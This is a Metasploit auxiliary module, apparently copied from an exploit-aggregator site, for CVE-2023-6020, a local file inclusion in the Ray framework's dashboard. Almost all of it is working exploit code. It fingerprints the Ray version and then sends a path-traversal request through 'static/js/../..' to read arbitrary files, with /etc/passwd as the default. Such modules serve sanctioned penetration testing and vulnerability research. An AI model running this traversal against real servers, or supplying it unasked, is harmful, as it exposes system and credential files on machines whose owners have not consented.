Share
## https://sploitus.com/exploit?id=MSF:AUXILIARY-GATHER-RAY_LFI_CVE_2023_6020-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Ray static arbitrary file read',
        'Description' => %q{
          Ray before 2.8.1 is vulnerable to a local file inclusion.
        },
        'Author' => [
          'byt3bl33d3r <marcello@protectai.com>', # Python Metasploit module
          'danmcinerney <dan@protectai.com>',     # Python Metasploit module
          'Takahiro Yokoyama'                     # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2023-6020'],
          ['URL', 'https://huntr.com/bounties/83dd8619-6dc3-4c98-8f1b-e620fedcd1f6/'],
          ['URL', 'https://github.com/protectai/ai-exploits/tree/main/ray']
        ],
        'DisclosureDate' => '2023-11-15',
        'Notes' => {
          'Stability' => [ CRASH_SAFE, ],
          'SideEffects' => [ IOC_IN_LOGS, ],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8265),
        OptString.new('FILEPATH', [ true, 'File to read', '/etc/passwd'])
      ]
    )
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'api/version')
    })
    return Exploit::CheckCode::Unknown unless res && res.code == 200

    ray_version = res.get_json_document['ray_version']

    return Exploit::CheckCode::Unknown unless ray_version

    return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3')

    file_content = lfi('/etc/passwd')
    return Exploit::CheckCode::Vulnerable unless file_content.nil?

    Exploit::CheckCode::Appears
  end

  def lfi(filepath)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{filepath}")
    })
    return unless res && res.code == 200

    res.body
  end

  def run
    file_content = lfi(datastore['FILEPATH'])
    fail_with(Failure::Unknown, 'Failed to execute LFI') unless file_content
    print_good("#{datastore['FILEPATH']}\n#{file_content}")
  end

end